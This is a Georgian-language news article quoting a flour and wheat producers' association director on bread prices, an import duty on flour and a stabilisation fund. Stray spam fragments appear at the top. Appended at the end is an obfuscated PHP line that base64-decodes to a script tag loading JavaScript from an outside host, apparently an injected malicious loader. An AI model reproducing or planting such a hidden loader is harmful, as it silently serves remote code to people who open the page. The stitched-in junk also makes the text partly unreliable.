celsiusi
ავერსი jaluzi

ქვეყანაში არის ინფლაცია და ასე თუ ისე, ყველა პროდუქციაზე ფასი იზრდება. პური არის სენსიტიური თემა, შესაბამისად, ფქვილი და ხორბალი გამოყოფილი თემა და სახელმწიფოს მუდმივი ზრუნვისა და მონიტორინგის ქვეშ უნდა იყოს, - ამის შესახებ „საქართველოს ხორბლისა და ფქვილის მწარმოებელთა ასოციაციის“ აღმასრულებელმა დირექტორმა, ლევან სილაგავამ მედიაცენტრ „მთავარში“ გამართულ პრესკონფერენციაზე განაცხადა.

სილაგავას თქმით, მსოფლიოს მასშტაბით ხორბალსა და ფქვილზე ფასები გაზრდილია. 

„საიმპორტო გადასახადის მოხსნა ნიშნავს, რომ წისქვილკომბინატი უნდა გაჩერდეს და სეზონზე ხორბალი ვერ ჩაიბაროს წისქვილკომბინატებმა. ანუ, 2 დარგს პრობლემა ექნება. შესაბამისად, საჭიროა ამასთან დაკავშირებით გადაწყვეტილების მიღება, სადაც სამივე დარგის ინტერესი გათვალისწინებული იქნება“,- განაცხადა სილაგავამ.

როდესაც შემოდის ფქვილი, ქატო და ასე შემდეგ, მას ამ გადასახადის შედეგად გარკვეულწილად ბიუჯეტში თანხა შეაქვს. ეს არის 250 ლარი ერთ ტონა ფქვილზე. ამ გადასახადებით 1.5 წლის განმავლობაში დღეს დაგროვილია 50 მლნ ლარი. ეს არის მოსაკრებლის ფული“, - განაცხადა სილაგავამ.

მისივე განმარტებით, ამ ე.წ. სტაბილიზაციის ფონდიდან 50 მლნ-ს გამოყენება შეიძლება იმისთვის, რომ პურზე ფასი დასტაბილურდეს. 

„ეს გადასახადი შემოვიდა იქიდან გამომდინარე, რომ რუსეთის მხრიდან კონკურენციის პირობები დაირღვა ხორბალზე და მის საპირწონედ შემოვიდა ეს გადასახადი იმისთვის, რომ ბაზარზე კონკურენციის პირობები დაბრუნებულიყო. ამან ბუნებრივად მოიტანა ის, რომ ემუშავა როგორც წისქვილებს, ისე მეხორბლეებს და პურის ქარხნებს. ეს იყო ბაზარზე კონკურენციის სწორი პირობების დაბრუნება, რამაც სამივე დარგის მუშაობა მოიტანა. დღესაც ეს კონკურენციის პირობები შენარჩუნებულია და მუშაობს როგორც ხორბლის წარმოება, ასევე წისქვილკომბინატები და პურის წარმოება. ფასთან მიმართებით გარკვეული გამოწვევებია“, - აღნიშნა სილაგავამ.

57
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");